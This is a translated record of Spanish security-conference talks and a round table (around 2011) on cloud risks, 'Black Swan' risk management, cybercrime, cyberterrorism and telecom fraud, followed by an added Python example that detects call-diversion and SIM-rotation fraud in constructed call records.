In view of this, what are the main threats on the Network? What works against us now? On the one hand, the illusion of borders does. We are now connected to many more people and do not even know that we are. We have all kinds of electronic devices, connected to one another and to many other people, so that there is no longer a wall behind which we can hide our privacy. On the other hand, another threat on the Internet is the existence of weaker infrastructures. We depend on many organizations to make our business run well and to keep in touch. These sometimes have problems, and if they have problems, then our business suffers too.
For example, if the Internet connection doesn’t work, we must wait for the ISP to start up the backup system so that the failure affects us as little as possible. Moreover, laws are often written with much delay. By the time they are approved, the threats against which the regulation was imposed have evolved to another level, which soon makes the regulation obsolete. And we are not evolving at the same pace as cutting-edge technologies either, such as geolocation, or key business aspects such as supply chains, which are increasingly weaker and more relocated. Other important threats are also the increased number and sophistication of criminal attacks, the increasingly strict rules and the characteristics of outsourcing/offshoring environments.

A note about malware on mobile phones: we have barely encountered this threat because
criminals do not find this scenario attractive. But that is only a small part; the important thing now is for us to avoid losing the phone with sensitive data inside. In London, every day up to 10 mobile phones are left forgotten in taxis, with very important data of the companies for which their users work. We must protect these devices, which are increasingly focused on the business and hold increasingly confidential information.

On the other hand, the business continuity plan becomes essential if we are to avoid major complications later. The cost of data loss per person per year for a company reaches $75, so if a company loses the data of, say, 100,000 people, the cost is very high, and this is regardless of the fines, audits, etc.

And the rise of what we now call “digital human rights” is unstoppable. The right to be connected or to freely surf the Internet is already an acquired right that nobody is willing to lose. It is an interesting topic nowadays, and it will be even more so when the other countries of the world also take part in this connection, when Africa or Asia are truly integrated into our networks and claim the same role. And there we will have to solve a quantitative problem, because we will incorporate into our “cake” many millions of people. There will be many opportunities, but also many threats.

And in the middle of this picture other topics will explode, such as the Internet of Things, devices that speak with devices without human intervention; and the shortening of the supply chain. We will no longer depend on a single source of supply, but on multiple sources. And it will be important to detect which will be the critical suppliers for our business.
Four categories and 5 important points

We can speak of four threat categories depending on whether we know them or not: those we know and about which we can do something; those we know but can do nothing to avoid; those of which we have no idea; and, finally, those not considered by anyone but which can cause much harm to the organization.

In essence, we must take into account five points: people are increasingly less loyal to companies; there are environments that we cannot manage or control, like social media; the requirements demanded by different governments; offenders’ optimized ways to deceive and earn more money; and, finally, our particular “Black Swans”.

Then, what can we do? Start planning now. Work to make our systems more secure. And we will do so by following a few simple steps. First we have to look at the risks that can affect our organization and information, and then look at the threats that could harm us most. And once we have common ground on that, resort to using technology, and not only known technologies, but also those emerging ones that can
provide us with extra protection. We must also have the necessary patches and updates, and pay identity management the attention it deserves. And of course devote more resources to training and knowledge. Some data regarding this point: most organizations spend around 4% of their budget on information security; but the companies that work better, with greater benefits and usually with fewer incidents, spend between 15% and 25% of their budget on knowledge programs, because they think that this is what gives the best results.

7 deadly sins of the cloud

I’d like to list below the most common problems that exist in “the cloud”, which we also call the “7 deadly sins of the cloud”. The first would be to be familiar with what we want to manage afterwards. The second: we always have to know our responsibilities, because “the cloud” provider will sell us a service, but we will always be liable for it. The third deadly sin is that we must understand very well what the provider will provide us and how we can measure it. We must be able to answer the following questions: are they doing what they say they are going to do? How do I know? And this is taking into account that evaluation in “the cloud” is different because everything changes. The fourth deadly sin has to do with breaking the law, as we may be breaking a law in a given country and not know it. The fifth is related to chaos, disorder: what information is in “the cloud”, which of it is critical and sensitive, and what I have to do with it. The sixth sin is vanity: thinking that your infrastructures are perfectly prepared for “the cloud” because you have installed firewalls and other tools, thinking that it cannot affect you… And, finally, the seventh deadly sin is indulgence. We must ensure that our cloud provider has business continuity and disaster recovery plans.
And lastly, “consumerization”

Ultimately, we must keep in mind that cloud technology has come to stay. It will not disappear and we must take full advantage of it. That’s why we must also educate our users to have more knowledge, and see what devices we are going to support and what not, and what applications we are going to use and with what data. We must make these decisions today, because if we don’t, tomorrow we will be flooded with information everywhere and we will have decided no strategy in this regard.

The best thing to do is keep up with changes. We must not intend to work as we do now. We must work towards business and because of business. And if business changes, we all change. Our world is going to change and we have to be prepared.
THE RISK OF THE UNPREDICTABLE: “THE BLACK SWANS”
José Antonio Mañas (Professor at the School of Telecommunications Engineering, University of Madrid)

My presentation has as a common thread the concept of the “Black Swans”, which, as stated in the book by Nassim Nicholas, and as handled in the sector, has to do with the impact of the highly improbable. The concept refers to those events that sometimes occur but are not at all predictable. Actually, adapted to our land, we should say “green dogs”, as when it was said in my town that “you are odder than a green dog”. However, this predictability thing is entirely relative, since what is predictable for some is not at all for others. I take as an example the turkey we eat at Christmas time. Nothing could have led the turkey to think that we would eat it on that date, being so happy and well cared for. However, it is something totally predictable for the one who will cook the dinner.

Unpredictable with high impact

In this context of the unpredictable, the most interesting for us are the things and events that, besides being unpredictable, have a great impact on our Organization. So, to understand how we arrived at this part, we can analyze how risk analysis works according to the scheme of cold and hot areas. Area one, the hottest, raises the existence of a high probability and high impact. They are things
that occur often and that, moreover, “hurt”. This is, undoubtedly, the first thing we have to face as the people responsible for the security of our Organization. As we descend below area one, the high frequency of events remains, but not the impact, which starts to decrease. We don’t usually talk about all this because it has no further effects, but they are what we can call “annoying flies”. Approaching the warmer area, with less likely things and with less impact, the so-called level 2... here we must decide what we do and what we risk. We think of what benefit we get and look at, for example, what the competition does. In this section, our action is often settled by the regulator and the regulations that apply.

After these two areas, we would be at area three, where we come across events that, besides occurring rarely, are also not important. In my opinion, there is no problem in forgetting these events, or otherwise considering them “opportunities” rather than risks. And the fact is that we always have to look at risk from the perspective of the benefit that assuming it brings us; it is always necessary to make a business estimate. You’ll take on a risk if there is a potential benefit; otherwise, you won’t.

Finally we have section four, where the following two conditions apply: it occurs very rarely; but, however, it has a high impact if it happens. That is outlined in the expression “whatever comes, God willing” * in SME language. But if you are in a bigger company, it is inevitable to be aware of everything that could happen, even if it is something completely remote. When we say very low probability, we are talking about extremely infrequent events; those others that are not impossible but have never been observed; and those that, although possible, we have tackled preventively to make them virtually impossible.
The latter refers to our own action as those responsible for security, and the approach based on security barriers, cryptography, support centers, etc. Although, be careful with what is observed, because what we don’t see in one place or in one environment can happen in another. Like the “Black Swan”, not observed in any place at any time, and yet it appears somewhere else in the world.

Calculating probability?

At this point, the big question is whether we can calculate the probability, whether we can do a risk analysis, and whether we can reach the “midpoint effect”, which is everything that occurs many times. Here we must take into account that experience predicts only what is more likely and that the Gaussian curve requires lots of observations, which in my opinion leads to the concept of extreme uncertainty and tells us that it is unlikely to happen. Thus, when we are talking about a singular object, there is no valid statistic and here we are not able to predict. And with regard to the fact that experience
can only predict what is likely, we must note that this depends, in any case, on the subject, one’s own experience, the situation, etc. We also have to talk about what is unlikely, remote, and where the impact is uncertain. We do not know what will happen, but we suspect that it may have a costly impact on the business and our assets. Here there is no experience of our own or of anyone else’s, and we can consider ourselves part of the problem. Here, as Heraclitus said, “into the same river we enter and don’t enter, because we are and are not”; nothing is like the first time; the river is not the same because the water runs, and so we can never bathe twice in the same river. We are in the uncertain cases, in that impact.

In these cases, we begin by analyzing our own reaction in the race against impact, and the external reaction: the reaction of shareholders, customers (who can be very loyal, but can also opt to penalize you when the slightest impact is detected), the public authorities (which sometimes seem to do nothing and at other times seem to contribute to generating even more alarm) and society (where you can be put on public trial without many guarantees, where they wonder if you take advantage of the situation, if you’ve done everything possible, etc.). The framework we are in has a mathematical model of probability that is hard to know and another of impact that is difficult to safeguard against, therefore all plans and predictions should be made with a “certain amount of art”. In this scenario of risk management, the first thing to consider is to prevent everything that we can prevent, provided that the cost is justified, where we could deal with actions of management, risk prevention, impact limitation, etc.

* Note from the Translator: Spanish saying “Que sea lo que Dios quiera”.
A second issue is also important: considering the expected disaster scenarios, if the incident was predictable. Thirdly, regarding risk management, we have to consider crisis management itself. Here we can talk about four things:
...the predictive indicators (from the causes we can predict what is going to happen; for example, with amber traffic lights, we know that red follows. Nevertheless, we have to be careful with these indicators, because they seldom occur);
...alarm detection and escalation (we must have detectors, with a controlled chain of them… “don’t tell me you’ve changed the mobile phone number and I don’t have the new one”, and take special care with the so-called false positives, which may “harden” us and prevent us from detecting the problems later when they happen);
...the management of those affected (whether information technology systems, the business itself, customers, providers, supply chain or society…);
...and the recovery to bring the business back to its usual practice (here we have our disaster
recovery plan, the backup systems… and that is because “business as usual” no longer exists).

Incident management

When it comes to dealing with the management of the incident, there are two options: either we have a passive attitude or the way we handle the conflict is reactive. If our way of interacting is passive, then we can only remain impassive, watching how the disaster evolves. This carries a high level of paralysis, as in the SME saying we mentioned, “whatever God wants”. If, on the contrary, our attitude is reactive, which I think is the least we have to start with, we can either stop it so it doesn’t become serious or redirect it to make the most of it. The same thing happened to the classic firm Levi Strauss, which began selling fabrics to make tents, and one day the ship with all of the fabrics sank. The way that crisis was managed resulted in the adventure of the brand as the firm of the well-known jeans.

Once we reach the disaster, we still have different options too, which will lead us to different results. It may be that we return to where we were before the aforementioned happened, being able to apply different disaster recovery plans; or we can take advantage of the new opportunities coming up in front of us. Within this context, we can also learn to anticipate these disasters and react according to what interests us most, being always able to learn from the experience. And above all, a fundamental question: do we leave as Managers the same blind people that failed to anticipate this disaster? There will be no choice but to answer this question, although the definitive answer many times will depend only on the company stakeholders.
Regulation and compliance

In the regulation and enforcement section, we often find the assumption of “fast” responses to scenarios that perhaps will never happen; but many times we have no option but to do so. Complying with the different regulations responds to several tasks that we cannot disdain, such as calming the social alarm; but it is also true that it is quite complicated to validate its effect, since it is a rapid intervention in an unpredictable process. In other words, we do not know if we can measure it, we cannot validate whether what we do is correct or not; this is called a “feedback system”, from the point of view that we often legislate under much pressure for an event that may happen every 300 years, for example.

On the other hand, and inevitably, regulations serve to make companies take certain measures that they otherwise would not assume. This is what is known as “fear of failure to comply”. There are many reasons why a corporation does not hesitate to comply with the regulations affecting it. Among others we can highlight
the following: staying out of the market, if you are in a regulated field; or, of course, being caught “without having done our homework” in case of an unpredictable incident, which we must avoid; and, much less, ending up in prison.

Protect and diversify

That being so, the best solution to survive a severe incident, which can have a high impact on the business, is “not putting all the eggs in the same basket”, that is, diversifying (clients, services, segmenting the market, etc.). But in order to understand how we arrived at this point and why, we first have to go on a tour that illustrates this development. We have to talk about what we’ll call “business forecasters”, which in turn are split into two categories: exposed and protected, a philosophy where we’d place this theory of diversification and segmentation.

Starting from the beginning, and within the mentioned “forecasters”, the greatest impact of all possible happens when, as I said before, we have put “all the eggs in the same basket”, when everything is interconnected and vulnerable to an attack at the same time. We are also more exposed when we have not properly defined the safety margin, where you were recommended to put several doors and hide away, by segregating networks or designing a DMZ cloud. In short, you gain much with these lines of defense, which can be deployed throughout your organization. We take advantage of alarms, and the advantage they give us against risks. And this is very important to take into account, despite the fact that these safety margins are often costly and complex. Here it is also important to make a reference to resource optimization, something we resort to on many occasions, even more so in times of economic recession such as those we are living through now.
This is important and has its advantages, of course, but it also puts us in the following position: precisely because we are optimal we end up being more fragile against the attacker, and our vulnerability can scupper many achievements obtained with so much effort. The “rapid spread” condition also plays against us, when any vulnerability or attack means imminent arrival at our systems and rapid expansion through our networks and infrastructure. The physical security people have this more under control, and always advocate avoiding these fast propagations by resorting to what they call “retarders”. I take as an example, in case of fire, the use of fire-retardant materials in the construction of certain facilities or as part of the clothing of those who have to perform rescue tasks; in the end, the idea is to delay the spread of the fire. And following the example provided by physical security, in our logical security departments we must go beyond installing a password,
a token, etc., and think about the ability of a threat that reaches that route to spread. And we should always take into account the dynamics and the versatility of incidents, because if we see them we will be able to adapt to them and fight against their effects. However, when we look at the dynamics topic, the most important problem that I see is globalization, so that an incident may reach our systems more quickly than before and from any part of the globe. In addition, we always have to see if there are watertight compartments, and bear in mind that what we often do is simply to foresee an isolated incident, but not the concurrence of several of them. And in relation to cloud computing, I have to say that I am very afraid of the use of cryptography in these environments, because if we have the impact bounded we are protected, but we are not otherwise.

Summarizing the above, and to make clear what the elements and actions are that allow an organization's assets to be protected, we return to the subject of bounded impact and the diversification of actions, which I stated as "not putting all the eggs in the same basket". In the same way, it is necessary to have an adequate safety margin, with layers of defence, systems redundancy and resilience capacity. This last capacity, to keep the essential services running after the attack and to recover from it as soon as possible, is what defines the self-preservation quality of an organization, as well as its adaptability to a changing environment.

Finally, I should like to make the following point: the responsibility for the risk lies with the person who has to make decisions, who may be the Director of the company, and not with the operator or systems manager. We have clearly seen this in the National Security Scheme approach.
And finally, the fact that one person makes decisions and another one assumes the consequences must not happen. Decisions must be made by the people who will suffer the consequences. Finally, I highlight the following: there are a number of risks that we more or less know of, other risks that we do not even know of; we can find ourselves in situations we would not want to be in, but which we failed to foresee… and we must have a solution for that day. This is why it is also important that, when production managers design the service portfolio, they include the risk analysis of each service. I think that this may be a good target for 2012.
ROUND TABLE. NEW THREATS

This round table was intended to discuss whether there are any new threats or only, so far, new scenarios. It had the following participants: David Barroso, Fernando García Vicent, Juan Jesús León Cobos, Elena Maestre García, Alfonso Martín Palma, Rafael Ortega García, Tomás Roy Catalá, Juan Salom Clotet, Marta Villén Sotomayor and Marcos Gómez Hidalgo, chaired by José de la Peña (director of SIC magazine).

David Barroso
S21sec Director e-Crime (Currently head of Security Intelligence AN DLAB. Telefónica Digital)

I would change the title of the table and would rather call it "old threats", because, deep down, what we are experiencing today is no more than a copy of what we were suffering six or eight years ago. Though we might consider it in terms of new platforms (for example, smartphones), rather than new or old threats; and, mainly, of new players. All this coupled with a situation where we continue to rest on unsafe foundations and are failing in the way we address these threats.

Regarding the fact that we rest our philosophy of security on unsafe foundations, suffice it to say that we are still talking about TCP/IP, SMTP, IDS; we are still using passwords; we invent new words like "clouds", but they were already here before; we are facing attacks that incorporate social engineering. In essence, we have the usual threats. What has changed is the way they reach us. We also fail in the way we address threats, because we are not going to the root of the problem, but patching on top of patches. We talk about mobile phones, but they are still unsafe (downloading an application that may carry a Trojan horse).
So, as I said, instead of talking about new threats I would talk about "new players", among which we can highlight the organized groups we have come to know so far; the threat arising from the citizenry itself, as Anonymous has demonstrated; or those related to Governments, which also play a role in Internet attacks. In the end, user training is the most important thing, and without further steps in this direction we can fight neither new nor old threats.

Fernando García Vicent
Director, Information Security and SOC. Group Mnemo

In my opinion, and trying to link up with what Mr. Barroso has just raised, we are not only encountering a new playing field and new players, but in addition they are more and more professional, which leads us to a change of direction from cybercrime to cyberterrorism. In other words, I think that we have gone from attacks with an economic motivation to other attacks where there are already other interests, more focused on doing real damage, as we have seen in some denial of service and nation-versus-nation actions.

In this position, I would like to stress two points, which could be interesting for discussion. The first is the importance of preventing security holes within the organization in order to combat fraud, since any hole usually comes from an illegal action that in turn comes from inside and materializes by releasing information to the outside. In other words, most of the attacks that we have recorded had their root, for example, in internal phishing using professional networks such as LinkedIn. That is why it is important to know what is happening within the organization to prevent information leaks. And it is important to pay particular attention to the security perimeter and to threats arising from mobile devices, which are already a very important dynamic element.
Secondly, we must talk about verification of the authenticity and code signature of applications that are being downloaded, and even the use of digital signature techniques and signature verification on transactions from mobile devices; used together, they can shed more light than individually. Having said all that, I also stress the importance of defining global strategies for the detected threats that are of global scope. Here there are two elements: one, championed by the leading market analysts, which is sharing information, related to establishing intelligence procedures to know what happens and how the attackers move, and to incorporating on-line detection techniques and scoring tools so that we can somehow see when fraud occurs; and another, the product of the sum of analysis tools, to obtain measurements and indicators of how such threats are occurring. And finally, there are the so-called "Internet of people" and "Internet of things".
Juan Jesús León Cobos
Product Manager. GMV Solutions Global Internet SA

I agree with what has been said: instead of new technologies this is about the existence of new players. However, in my opinion, in recent years we have indeed seen new things. And, in fact, I think that there has been a change that affects the three different types of threats we know: those which pursue money or profit (cybercrime), those looking for power (cyberterrorism or cyber-espionage) and those which simply seek to "annoy" (cyber-anarchists). In regard to cybercrime, everything has gone very quickly. There has been a consolidation of malware; it seems that they are organizing a kind of monopoly system to better manage their evil, and here they have defeated us a bit. While we have technology to fight against the "bad guys" (robust authentication, modern endpoint security, etc.), it is difficult for organizations to follow the pace of technology, whereas the criminals do follow it. In my opinion, they have everything they need. Regarding the cyber-anarchists, which is a new phenomenon and is orchestrated through new things like social networks, I think that it will be the threat making the most progress over the next years. And I think, also, that it is very difficult to combat. We can only prevent it, and not entirely, and for any action we will need a lot of intelligence. They can do much damage by attacking the clouds and through their anti-establishment philosophy; they can also infiltrate social networks and take control.
And I think that many Governments could also infiltrate them to keep track of them and be more aware of the new scenarios of cyberterrorism and cyber-espionage. Finally, we can also refer to a new term, coined by an excellent professional, Javier Osuna, which is cyberdemocracy, defined as a mechanism of reaction of the "good people" who are in social networks to combat, in a collaborative way, these anti-establishment people who can be so negative.

Elena Maestre García
Partner of PwC. Head of Technological Risks

I am going to refer to three fundamental issues: the definition of what the new threats are and their relationship with fraud; what I call the seven dilemmas of threat evolution; and finally, how I see some conclusions and the challenge of responding to fraud. Regarding the first, when we say new fraud-related threats we refer to unlawful acts which pursue profit (which, moreover, can be direct or indirect, or what I call an "incubator of ideas", allowing third parties to take advantage in order to commit criminal acts). So, in essence, when we refer to new threats we are talking about two things: a question of capacity,
which today has much to do with technological advances; and, on the other hand, aspects related to intentionality.

In regard to the seven dilemmas of threat evolution, these are as follows: a first driver that has to do with advances in technology and communications, which have advanced so rapidly that they have opened up new security breaches, now with a single blow to the whole world; changes in operations and in the way of doing business, such as, for example, on-line recruitment, which open new routes for fraud; the rise of the information poured into social networks, and, above all, in a less professional environment with a lower level of rigour; the aspect of globalization, as the fourth factor, where it is easier to learn and replicate attacks, and harder to put up barriers in an interconnected world; anonymity, which introduces a certain amount of impunity when it comes to committing an offence; professionalization and industrialization on the hacker's side, where there are already organized networks willing to pay big money for sensitive data; and, in seventh and last place, cost, the fact that in some environments fraud has a ROI.

I would also like to mention the massive penetration of cyberattacks, since, according to some studies, 80% of the companies that we know have admitted some act of cyberattack. And this is no longer a concern exclusively of businesses, but also at governmental scale, and it also affects the protection of critical infrastructures. Therefore, in view of this situation, I believe that the responses must change. We must evolve towards a new way of managing these threats, beyond strict perimeter protection.
Actually we must take a more proactive position in the fight against fraud, assuming that the challenge is on the front of information analysis, so we need to increase our knowledge of behavioural patterns of conduct. Other aspects would be the demonstration of these situations of fraud, many times something very complex; the aspect regarding investments, which are never enough; and the dynamics of business, where it is often difficult to put in place reasonable security levels to avoid fraud.

Alfonso Martín Palma
Head of Cybersecurity. INDRA

In our organization, when it comes to identifying new threats related to technological fraud, we focus on three aspects: the techniques used to attack; the technologies that are being attacked; and the change in the profile of the attacker. Regarding the techniques used to attack, we think that while new threats have emerged, the fact is that the matter of the counterattack is mature enough. There is no doubt that we need more investment, and that the attackers are becoming more sophisticated; but we can also argue that our level of response has increased in strength and maturity.
On the other hand, mobility, social networks and geolocation are some of the new technologies targeted by the latest attacks. Also what is called "the Internet of things" and the critical infrastructures, where an attack would allow taking control of assets as significant as running water, electric power or natural gas, and communications. In my opinion, there is a risk in all these scenarios, as in many cases cost savings and ease of use take priority over security, and this can sometimes lead us to a system more vulnerable than before.

The change in the profile of the attacker is bringing about a more drastic change in the current situation of attacks. We are facing traditional terrorist groups, but also groups of cyber-anarchists, the anti-establishment people, and within these we see the so-called "outraged". The strong point of these groups is the great mobilization capacity of like-minded people, who at any given time can perform combined simultaneous attacks. And, finally, cyber-defence and cyberwarfare will be the biggest changes in this landscape in the coming years. There are already acts of war in cyberspace: it is already known that Russia was behind the attacks on Estonia; we also know that the Chinese are very active, although they are more on the side of espionage; actions on the Canada channel or in Canadian ports have already been detected to control sea traffic… or the actions developed by the United States or Israel, or jointly, to damage Iran's nuclear program. Here cyberwarfare is already mixed with the protection of critical infrastructures. In these circumstances, what we have to do is to change our strategy and invest more in cyber-intelligence, and thus take advantage of all the experience, both in the virtual world and in the physical world.
And moreover, I consider it essential that nations begin to consider technological fraud as a matter of national defence. It is necessary that the nation guarantees the security of citizens and enterprises when any of them operate on the Internet. I think that it should be something not only linked to the business world; it should not be just the responsibility of the companies in the sector, but also governmental. Just as we have services such as the police, the army, the fire department, etc., the Government can also ensure our rights and interests in this area. Thus the first steps have already been taken: the U.S. and NATO have their own cyber-defence centres, and many other Western countries are launching similar initiatives.

Rafael Ortega García
Advisory Partner at Ernst & Young (Currently responsible for the area of Governance, Risk and IT Security at Solium)

Honestly, I have no idea how to approach the advent of the future based on the vision of what we have now. What I believe is that we face a major problem hindering progress, and the fact is that we have been 20 years with the same security model.
With the emergence of the Internet and data protection, we have created a very comfortable environment, where I handle my risk management analysis, my ISMS, my compliance and my vulnerability management, and there I am at ease. And, on top of that, I am subcontracting. And this comfortable environment is the problem, because it creates a false sense of security, which in many cases makes it difficult for us to approach an environment of uncertainty, where we really should be in order to grow. The key is that we must stay and operate in an environment of uncertainty. And for that to happen we must maintain a state of permanent alertness, prepared for the impossible. On the other hand, I also believe that we have made a lighter security, and now the "bulls" that are approaching us are bigger. Now we create predictive models, but for this we must have saved historical records…, but how many do we have saved? And this is one of the main fronts where we security people have thrown ourselves and now have to make a stop. At the same time the key question in these points is the team, the human factor that can fight and give answers to what is coming… and this is only provided by experience, training and continuous education.

Tomás Roy Catalá
Director of the area of Quality, Security and Relations with Suppliers. Centre for Telecommunications and Information Technology (CTTI), Generalitat de Catalunya

From my perspective, there are new threats; and within them, another problem, which amounts to a challenge to solve: a big budget cut amid the crisis, which generates big risks to the viability of the type of projects and services that should be provided and of how to fit into this.
Another threat comes from the creation of transformation processes and services, and technological transformation processes, which are summarized in the motto "more for less and better"; and, in addition, we are also having problems of obsolescence of applications and maintenance of services. They are threats, therefore, which we are not used to (in Catalonia we are, for the first time since last year, in a situation where there is no economic growth), and against which CESICAT (Centro de Seguridad de la Información de Cataluña), with its Computer Crime Unit, cannot fight. Now, we are monitoring social networks to find indications of new movements and criminal actions. In this sense, we cannot ignore the attacks we have suffered, just like other agencies, coming from citizen groups. We suffer from different types of attacks, such as those concerning data integrity, the image of the agency, those of an economic type, or denial of service.
Apart from all this, there is a threat that worries me especially and it is the one concerning critical infrastructures. Here there is a criticism that I would like to make, because ICTs are not included in civil protection plans, whereas heavy snowfalls, floods, etc., are included. ICTs are never considered, and it would be interesting to raise in these scenarios the recovery and resilience of ICTs. And secondly, I also advocate the development of an action plan for when ICTs are the attack vector. In other words, we develop a recovery plan when the attack, as is happening now, is targeted against the business. In essence, we should focus our efforts, in this order: critical infrastructures, business continuity, and services assurance. And after this, two very important topics we have been dealing with from the security area: applications performance and infrastructures. And we have the challenges of log management and monitoring. I think that times will change. It is true that we have lived through a period of comfort, but these attacks will put the head of security in a position of responsibility, leading him/her to make decisions. Here I make a very brief reflection: all companies that hold assets define people responsible for protecting them and ensuring that they will be supported over time (it may be money, the human resources part, etc.), but there is one asset that remains largely unprotected: information, maybe because the CISO is not fulfilling his/her job.

Juan Salom Clotet
Major of the Civil Guard and Head of the Telematic Crime Group (currently Director of International Security of the Santander Group)

I am going to talk about two scenarios which for me are two new threats in technological fraud. The first is the socialization of technological fraud and the second is on-line gaming.
With regard to the first point, and this may a priori contradict what was said here about specialization, I believe that we have gone from that particular pairing we saw between hackers and specialized crime to exploit electronic banking (today I think we can already say that the banks have won the battle, minimizing the impact of these frauds) to the fact that currently they need neither money nor organization to commit a crime of technological fraud. Malware is designed and sold as a business at a very low price, as demonstrated by, for example, "Operation Mariposa", where some kids had bought some botnets for 500 euros, able to control an incredible quantity of systems. We are no longer talking about organized groups, but about small groups who buy malware, a botnet or another tool, and exploit them. We are lowering fraud to mini-fraud, where the victims are multiplying. And this is focusing, mostly, on e-commerce. And we are witnessing an important movement of loss of confidence in the entire system, in businesses, in the Internet.
On the other hand, and as I pointed out before, the second stage of technological fraud is online gaming, which is not regulated, neither for service delivery nor for the fiscal aspect, even though we have introduced an Internet gaming law; but in my view it is very open and lacks regulatory development. From our unit at the Civil Guard we have seen situations that either become a money laundering scene for other criminal acts, or carry out criminal practices in the game itself. Here it is very difficult to keep track, because gaming is run by multinationals or groups that operate internationally, and they safeguard the profits by fleeing to the tax havens of the network.

Marta Villén Sotomayor
Department of Logical Security and Fraud Prevention. Telefónica Spain

I am going to talk about a very specific case, the fraud we suffer in the telecommunications operators: how it has changed in recent years and how it is now becoming a fraud against the customer, not the operator. We talk about micro-frauds and a large number of clients. The first documented case of telephone fraud dates from 1958, carried out by a blind 9-year-old American boy against the Bell Company. He discovered that a specific sound activated the PBX programming mode, and so he called for free. After that, we came to a time when the mafias carried out detailed attacks on an operator, or several; but now the picture has changed. Before, we were fighting against a fraud based on setting up call booths, and now they are real traffic sinks on the network, where fictitious traffic is generated for the enrichment of the "bad guys". Last month we suffered an attack in which several telecom operators were involved.
The fraud originated with Vodafone phones calling en masse a single Movistar phone which had automatic call forwarding to a Telstra phone, which in turn made an international routing ending at a French operator… Call diversion has been the latest scourge for all operators, and fortunately we did not allow it for international calls, which has freed us from some fraud. And how are these frauds carried out? It is very simple. There is a whole marketing industry of specific devices for such a task, which can cost 400 euros. Machines like the Simbox, the Pool GSM mode… In addition, they have mechanisms to rotate the SIM cards so that they avoid looking criminal, so that all the detection and pattern algorithms we had are no longer useful. Their power is noteworthy: they can send up to 42,000 messages within 24 hours. But now, as I pointed out, what they are doing is to attack the customers directly. I take as examples
the following two: last year we had an average of one attack per day on customers' switchboards, where they compromised their security and charged calls to them; and the recent attacks on two social networks. In one of them, Tuenti, they spread a phishing among the contacts to obtain a fraudulent subscription.

Marcos Gómez Hidalgo
Assistant Director of Programs. Operations Office. National Institute of Communication Technology (INTECO)

Of the 15,000 incidents that INTECO usually solves per year, related to end users and SMEs, nearly 40% deal with electronic fraud issues, about 7,000. Of these, more than 90% deal with attacks based on social engineering. This being so, and according to a study on fraud carried out in the last quarter of 2010, 53% of users declared having been victims of an attempt (not necessarily accomplished) of fraud in the last 3 months, highlighting the invitation to visit a suspicious website (35% of the cases), fraud through email (26%) and suspicious job offers (21%). On the other hand, among the forms that the issuers of suspicious communications take, we highlight banking identity theft, e-commerce and buying-and-selling webpages, and online lottery and gaming. Even so, we are optimistic: 95% of Internet users said they had not suffered economic damage in those last three months (and those who had suffered it, in an amount not greater than 400 euros). In addition, the number of banking Trojan horses was reduced throughout 2010 by almost 4 percent, staying at 39%. We have not registered many micro-frauds on mobile devices. Social networks, for their part, together with mobility, are the real crux of the matter for us.
And on top of this, at government level, we have the protection of critical infrastructures, where we work actively with ENISA (European Network and Information Security Agency). However, I continue to emphasize our work in threat detection, which also follows the lead in Europe. The European Commission has created a CERT, named EUCERT (though it still does not have its competences and objectives defined); we hope it will soon do a work of coordination that bears fruit. We also have to highlight the cyber-exercises. The first European cyber-exercise was carried out in 2010, where more than 400 incidents were solved in real time; and in 2011 it was carried out together with the US Department of Homeland Security. In our country, the Spanish Security Strategy stands out, on which we have collaborated in the drafting of the chapter on cyber-security, in which appear the roles of the administrations that will be devoted to protecting citizens, companies and the country in cyber-security... and on which we will see future Royal Decrees articulating this issue.
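As an added example, not part of the round table and not code from Telefónica or any of the operators mentioned: the two signals Marta Villén Sotomayor describes above, many callers converging on one number that is diverted abroad (the Vodafone to Movistar to Telstra chain), and a single SIM-box handset rotating through SIM cards, expressed as detection logic over call detail records. The CDR fields, the home country prefix, the sample numbers and the thresholds are assumptions for illustration, and the records are constructed inline so the block runs offline.

```python
# Added example: detection of the two mobile call-fraud patterns described above,
# run over constructed call detail records (CDRs). Not from the round table or any
# operator; field names, numbers, prefixes and thresholds are assumptions.
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

HOME_PREFIX = "+34"  # assumed home country code of the operator


@dataclass(frozen=True)
class CDR:
    ts: datetime                 # call start time
    a_number: str                # calling party
    b_number: str                # dialled number
    imei: str                    # handset identity of the calling party
    imsi: str                    # SIM identity of the calling party
    forwarded_to: Optional[str]  # number the call was diverted to, if any


def is_international(number: str) -> bool:
    """True for an E.164 number outside the assumed home country."""
    return number.startswith("+") and not number.startswith(HOME_PREFIX)


def find_diversion_pumping(cdrs: List[CDR], window: timedelta = timedelta(minutes=10),
                           min_callers: int = 20) -> Dict[str, Tuple[int, List[str]]]:
    """Numbers that receive calls from many distinct A-numbers within `window` and
    divert them to an international destination (many SIMs converging on one
    forwarded number). Returns {b_number: (peak distinct callers, destinations)}."""
    by_b: Dict[str, List[CDR]] = defaultdict(list)
    for c in cdrs:
        by_b[c.b_number].append(c)
    hits: Dict[str, Tuple[int, List[str]]] = {}
    for b, calls in by_b.items():
        calls.sort(key=lambda c: c.ts)
        best, dests, start = 0, set(), 0
        for end in range(len(calls)):          # sliding time window over the calls
            while calls[end].ts - calls[start].ts > window:
                start += 1
            span = calls[start:end + 1]
            callers = {c.a_number for c in span}
            abroad = {c.forwarded_to for c in span
                      if c.forwarded_to and is_international(c.forwarded_to)}
            if abroad and len(callers) > best:
                best, dests = len(callers), abroad
        if best >= min_callers:
            hits[b] = (best, sorted(dests))
    return hits


def find_sim_rotation(cdrs: List[CDR], min_imsis: int = 5) -> Dict[str, int]:
    """SIM-box signal: one handset (IMEI) seen with many different SIMs (IMSI)."""
    imsis = defaultdict(set)
    for c in cdrs:
        imsis[c.imei].add(c.imsi)
    return {imei: len(s) for imei, s in imsis.items() if len(s) >= min_imsis}


T0 = datetime(2011, 6, 1, 10, 0, 0)  # constructed reference time


def constructed_cdrs() -> List[CDR]:
    """Constructed sample: 25 calls from one SIM box rotating SIMs, all to one
    number that forwards abroad, plus ordinary traffic that must not be flagged."""
    cdrs = [CDR(T0 + timedelta(seconds=12 * i), f"+3461000{i:04d}", "+34600000001",
                "358123450000001", f"21401{i:010d}", "+33123456789")
            for i in range(25)]
    cdrs.append(CDR(T0, "+34699000001", "+34699000002",
                    "358999990000001", "214019999000001", None))
    cdrs.append(CDR(T0 + timedelta(minutes=3), "+34699000003", "+34699000002",
                    "358999990000003", "214019999000003", None))
    return cdrs


if __name__ == "__main__":
    sample = constructed_cdrs()
    print("diversion pumping:", find_diversion_pumping(sample))
    print("SIM rotation:", find_sim_rotation(sample))
```

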